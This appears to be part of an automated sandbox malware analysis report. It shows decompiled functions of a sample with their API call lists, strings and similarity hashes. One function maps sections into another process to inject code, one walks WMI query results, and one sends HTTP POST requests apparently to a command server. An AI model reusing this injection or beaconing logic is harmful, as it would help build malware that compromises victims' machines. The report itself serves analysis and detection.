				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0360D52E(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E036085EA(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E03608600( &_v60, 0xfffffffe);
					E0360D5E2( &_v104);
					return _t320;
				}
				_t165 = E036095C7(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E036095C7(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E036092CB(_t165);
				_v60 = _t322;
				E036085BB( &_v52);
				E036085BB( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E036095C7(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E036085BB( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E03608600( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E036091C9(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E036091C9(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E0360867E(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E036085EA( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E03608600(_t136, 0);
								E03608600( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E036091C9(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E036095C7(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E036095C7(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E036085EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E036085BB( &_v92);
											E036085BB( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E03609626();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E036085EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E036095C7(_t283, 0x219);
										E03609626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E036085BB( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E036091C9(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0360DA2B( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E03608600( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x0360db50
0x0360db56
0x0360db5d
0x0360db60
0x0360db63
0x0360db68
0x0360db6a
0x0360db6f
0x0360dfb7
0x0360dfb7
0x0360db7c
0x0360db7e
0x0360db81
0x0360db84
0x0360df9c
0x0360dfa2
0x0360dfac
0x00000000
0x0360dfb1
0x0360db8f
0x0360db96
0x0360db9d
0x0360dba0
0x0360dba5
0x0360dba7
0x0360dbaa
0x0360dbad
0x0360dbae
0x0360dbb7
0x0360dbbd
0x0360dbc0
0x0360dbc9
0x0360dbce
0x0360dbd3
0x0360dbea
0x0360dbf7
0x0360dbfa
0x0360dc01
0x0360dc06
0x0360dc0d
0x0360dc12
0x0360dc19
0x0360dc1b
0x0360dc27
0x0360dc2a
0x0360dc2c
0x0360df8c
0x0360df8d
0x0360df96
0x00000000
0x0360df96
0x0360dc32
0x0360dc35
0x0360dc38
0x0360dc3b
0x0360dc3d
0x0360df58
0x0360df5b
0x0360df5e
0x0360df60
0x0360df82
0x0360df87
0x0360df62
0x0360df65
0x0360df70
0x0360df77
0x0360df77
0x00000000
0x00000000
0x00000000
0x00000000
0x0360dc43
0x0360dc43
0x0360dc55
0x0360dc58
0x0360dc5a
0x00000000
0x00000000
0x0360dc62
0x0360dc65
0x0360dc68
0x0360dc6b
0x0360dc6e
0x0360dc71
0x00000000
0x00000000
0x0360dc77
0x0360dc85
0x0360dc88
0x0360dc8a
0x0360dca3
0x0360dcb2
0x0360dcba
0x0360dcba
0x0360dcbd
0x0360dcc4
0x0360dcc8
0x0360dcce
0x0360dcd0
0x0360df40
0x0360df46
0x0360df4c
0x0360df4f
0x0360df4f
0x00000000
0x0360df4f
0x0360dcdf
0x0360dcf3
0x0360dcf7
0x0360dcf9
0x0360dcfe
0x0360df0d
0x0360df13
0x0360df1e
0x0360df29
0x0360df2f
0x0360df35
0x0360df38
0x00000000
0x0360df38
0x0360dd04
0x0360dedb
0x0360dedb
0x0360dede
0x0360dee1
0x00000000
0x00000000
0x0360dd0c
0x0360dd14
0x0360dd1b
0x0360dd21
0x0360dd23
0x00000000
0x00000000
0x0360dd2c
0x0360dd41
0x0360dd47
0x0360dd50
0x0360dd53
0x0360dd56
0x0360dd58
0x0360dece
0x0360ded1
0x0360deda
0x0360deda
0x00000000
0x0360deda
0x0360dd68
0x0360dd6b
0x0360dd72
0x0360dd78
0x0360dd7b
0x0360dd7e
0x0360dd81
0x0360dd84
0x0360ddc0
0x0360ddc0
0x0360ddc3
0x0360de6f
0x0360de83
0x0360de93
0x0360de97
0x0360de99
0x0360deb0
0x0360deb4
0x0360debd
0x0360dec8
0x00000000
0x0360dec8
0x0360de9f
0x0360dea0
0x0360dea5
0x0360dea5
0x0360dea7
0x0360dea8
0x0360dead
0x00000000
0x0360dead
0x0360ddc9
0x0360ddc9
0x0360ddcc
0x0360de37
0x0360de4b
0x0360de5b
0x0360de5f
0x0360de61
0x00000000
0x00000000
0x0360de67
0x0360de68
0x00000000
0x0360de68
0x0360ddce
0x0360ddce
0x0360ddd1
0x00000000
0x00000000
0x0360ddd3
0x0360ddd6
0x00000000
0x00000000
0x0360ddd8
0x0360ddd8
0x0360ddde
0x0360ddfa
0x0360de09
0x0360de12
0x0360de17
0x0360de1a
0x0360de20
0x0360de20
0x0360de25
0x0360de31
0x00000000
0x0360de31
0x0360dde3
0x00000000
0x0360dde3
0x0360dd86
0x0360ddad
0x0360ddb2
0x0360ddb7
0x0360ddb9
0x0360ddb9
0x00000000
0x0360ddb7
0x0360dd88
0x0360dd88
0x0360dd8b
0x00000000
0x00000000
0x0360dd91
0x0360dd91
0x0360dd94
0x00000000
0x00000000
0x0360dd9a
0x0360dd9a
0x0360dd9d
0x00000000
0x00000000
0x0360dda3
0x0360dda6
0x00000000
0x00000000
0x0360dda8
0x00000000
0x0360dda8
0x0360deea
0x0360def0
0x0360def6
0x0360def9
0x0360defc
0x0360defc
0x0360deff
0x0360df00
0x0360df03
0x0360df05
0x00000000
0x00000000
0x0360df55
0x0360df55
0x00000000
0x0360df55
0x0360dc8c
0x0360dc92
0x00000000
0x0360dc92
0x0360df52
0x00000000
0x0360dbd5
0x0360dbda
0x0360dbdf
0x00000000
0x0360dbe3

APIs

Part of subcall function 0360D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D541
Part of subcall function 0360D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D552
Part of subcall function 0360D52E: CoCreateInstance.OLE32(0361B840,00000000,00000001,0361B850,?,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D569
Part of subcall function 0360D52E: SysAllocString.OLEAUT32(00000000), ref: 0360D574
Part of subcall function 0360D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D59F

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

SysAllocString.OLEAUT32(00000000), ref: 0360DBF0
SysAllocString.OLEAUT32(00000000), ref: 0360DC04
SysFreeString.OLEAUT32(?), ref: 0360DF8D
SysFreeString.OLEAUT32(?), ref: 0360DF96

Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646

Strings

TRUE, xrefs: 0360DDB2
FALSE, xrefs: 0360DDB9

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: f44da292390cdc516ec257fd32f271c0f4037225988bbebcf83f93119fdc2bd0
Instruction ID: 00b4bf9b4c3fed2e6dac9d31b4f32db68cef4d6a4bff551d9f5dff9507dff6f0
Opcode Fuzzy Hash: f44da292390cdc516ec257fd32f271c0f4037225988bbebcf83f93119fdc2bd0
Instruction Fuzzy Hash: CAE16B75E00219AFCB19EFE4C996AAFBBB9FF48300F14855DE505AB2D4DB30A901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0360C6CB, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0360C6CB(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x361e688; // 0x33f0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0360E249(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x361e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x361e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x361e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x361e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x361e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x361e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E0360864F( *0x361e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x361e684; // 0x530f6c8
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x361e684; // 0x530f6c8
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E03608600( &_v32, 0x1ac4);
					_t141 =  *0x361e688; // 0x33f0000
					 *0x361e688 = _t131;
					E036086C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0360C64A(_v12, _v8, _v36);
					 *0x361e688 = _t141;
					goto L14;
				}
			}

0x0360c6d1
0x0360c6d8
0x0360c6da
0x0360c6dc
0x0360c6de
0x0360c6e1
0x0360c6e4
0x0360c6e7
0x0360c6ea
0x0360c6ed
0x0360c6f0
0x0360c6fa
0x0360c6fd
0x0360c704
0x0360c709
0x0360c709
0x0360c70f
0x0360c711
0x0360c71a
0x0360c8c0
0x0360c8c4
0x0360c8c9
0x0360c8cf
0x0360c8d2
0x0360c8d2
0x0360c8d6
0x0360c8db
0x0360c8e0
0x0360c8ed
0x0360c8ed
0x0360c8f6
0x0360c8f8
0x0360c900
0x0360c900
0x0360c907
0x0360c907
0x0360c723
0x0360c724
0x0360c729
0x0360c72f
0x0360c731
0x0360c732
0x0360c733
0x0360c738
0x0360c739
0x0360c743
0x00000000
0x00000000
0x0360c74e
0x0360c758
0x0360c762
0x0360c765
0x0360c76b
0x0360c772
0x0360c773
0x0360c774
0x0360c77d
0x0360c77e
0x0360c77f
0x0360c781
0x0360c784
0x0360c787
0x0360c78a
0x0360c78d
0x0360c799
0x0360c7bb
0x0360c7c3
0x0360c7c6
0x0360c7d1
0x0360c7d1
0x0360c7c3
0x0360c7d7
0x0360c7e0
0x0360c7e2
0x0360c7e3
0x0360c7e5
0x0360c7e6
0x0360c7e7
0x0360c7e8
0x0360c7ec
0x0360c7f3
0x0360c7f4
0x0360c7fc
0x0360c8bd
0x00000000
0x0360c802
0x0360c802
0x0360c804
0x0360c805
0x0360c80a
0x0360c80b
0x0360c80c
0x0360c80d
0x0360c80e
0x0360c814
0x0360c815
0x0360c81a
0x0360c81b
0x0360c823
0x00000000
0x00000000
0x0360c839
0x0360c83b
0x0360c842
0x00000000
0x00000000
0x0360c853
0x0360c859
0x0360c861
0x0360c864
0x0360c86a
0x0360c87a
0x0360c886
0x0360c88b
0x0360c891
0x0360c8a1
0x0360c8ad
0x0360c8b5
0x00000000
0x0360c8b5

APIs

RegisterClassExA.USER32(00000030), ref: 0360C790
CreateWindowExA.USER32 ref: 0360C7BB
DestroyWindow.USER32(00000000), ref: 0360C7C6
UnregisterClassA.USER32 ref: 0360C7D1
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0360C7ED
GetCurrentProcess.KERNEL32(00000000), ref: 0360C8E6

Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646

Strings

0, xrefs: 0360C758
sadccdcdsasa, xrefs: 0360C749
cdcdwqwqwq, xrefs: 0360C775

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 24498192c60fc45ec1e7898d26cdcf1025088bfadc79be55c78ee6ae509d32f3
Instruction ID: ae0d9c5d3ee182d900fdc017c4a05233d11a01c17d93cee90034619fcf8da895
Opcode Fuzzy Hash: 24498192c60fc45ec1e7898d26cdcf1025088bfadc79be55c78ee6ae509d32f3
Instruction Fuzzy Hash: 2C714D71D00208AFDB15DF95D949EAFBBB9FB49700F18055AF905AB284D771AA00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0360E673, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0360E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E036095AD(0x85b);
				_v60 = E036095AD(0xdc9);
				_v56 = E036095AD(0x65d);
				_v52 = E036095AD(0xdd3);
				_t105 = E036095AD(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0360C384(_t214));
				_t113 =  *0x361e6a4; // 0x530fc18
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x361e6a4; // 0x530fc18
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x361e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x361e6a4; // 0x530fc18
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x361e6a4; // 0x530fc18
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x361e6a4; // 0x530fc18
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x361e6a4; // 0x530fc18
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x361e6a4; // 0x530fc18
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E036097F2(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x361e6a4; // 0x530fc18
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E036097F2(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E036095AD(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x361e6a4; // 0x530fc18
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0360C384(_t217), _a4, _a8);
										E036085A8( &_v12);
										if(_a24 != 0) {
											E036097F2(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x361e6a4; // 0x530fc18
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E0360972F( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x361e6a4; // 0x530fc18
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x361e6a4; // 0x530fc18
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x361e6a4; // 0x530fc18
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x361e6a4; // 0x530fc18
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x361e6a4; // 0x530fc18
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x361e6a4; // 0x530fc18
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x361e6a4; // 0x530fc18
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x361e6a4; // 0x530fc18
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x0360e67c
0x0360e68e
0x0360e697
0x0360e6a1
0x0360e6a5
0x0360e6b6
0x0360e6cd
0x0360e6da
0x0360e6e7
0x0360e6f4
0x0360e6f7
0x0360e6fc
0x0360e701
0x0360e703
0x0360e70b
0x0360e716
0x0360e71d
0x0360e729
0x0360e72c
0x0360e73a
0x0360e73d
0x0360e743
0x0360e744
0x0360e746
0x0360e74f
0x0360e750
0x0360e755
0x0360e75b
0x0360e765
0x0360e767
0x0360e76c
0x0360e76c
0x0360e77b
0x0360e78a
0x0360e78e
0x0360e79d
0x0360e7a0
0x0360e7a5
0x0360e7a9
0x0360e7b0
0x0360e7b7
0x0360e7bf
0x0360e7c7
0x0360e7ce
0x0360e7d6
0x0360e7de
0x0360e7e5
0x0360e7ed
